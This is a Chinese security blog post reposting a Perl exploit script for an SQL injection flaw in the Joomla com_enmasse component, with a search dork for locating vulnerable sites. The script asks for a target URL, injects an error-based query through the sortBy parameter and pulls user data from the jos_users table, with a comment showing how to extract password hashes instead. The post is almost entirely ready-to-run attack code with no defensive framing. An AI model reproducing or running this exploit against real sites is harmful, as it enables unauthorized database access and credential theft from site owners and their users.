注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[SQL注入]Joomla com_enmasse Remote Exploit  

2013-08-25 12:19:00|  分类: Web_0day |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
#!/usr/bin/perl -w
 
########################################
# Exploit Title: Joomla com_enmasse Remote Exploit
#
# Dork: inurl:index.php?option=com_enmasse
#
# Date: [06-08-2012]
#
# Author: Daniel Barragan "D4NB4R"
#
# Twitter: @D4NB4R
#
# site: http://poisonsecurity.wordpress.com/
#
# Vendor: http://www.matamko.com/
#
# Version: 1.2.0.4 (last update on Jul 27, 2012)
#
# License: Enmasse 6 Months Support & Subscription -  USD$358.20
#
# Demo: http://www.matamko.com/products/filexpress/live-demo.html
#
# Tested on: [Linux(bt5)-Windows(7ultimate)]
#
# Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc....
########################################
 
print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t        Joomla com_enmasse Remote Exploit \n";
print "\t\n\n";
 
use LWP::UserAgent;
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";
 
chomp(my $target=<STDIN>);
 
#$concatene="concat(password)"; //原 GetHash
$concatene="concat(username)";
$table="jos_users";
$d4nb4r="floor";
$com="com_enmasse";
$seleccione="select";
 
 
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
 
$host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=".$com."&sortBy=117 and(".$seleccione." 1 from(".$seleccione." count(*),concat((".$seleccione." (".$seleccione." (".$seleccione." ".$concatene." from ".$table." Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C".$d4nb4r."(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1";
 
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/)  {
 
print "\n Hash Admin : $1\n\n";
print " El exploit fue exitoso si desea ver mas datos modifique el script\n";
print " The exploit was successful if you want to see more data modify the script\n";
 
}
else{print "\n[-] No se pudo, intente manualmente\n";}
 
#####Daniel Barragan D4NB4R 2012################
  评论这张
 
阅读(1264)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016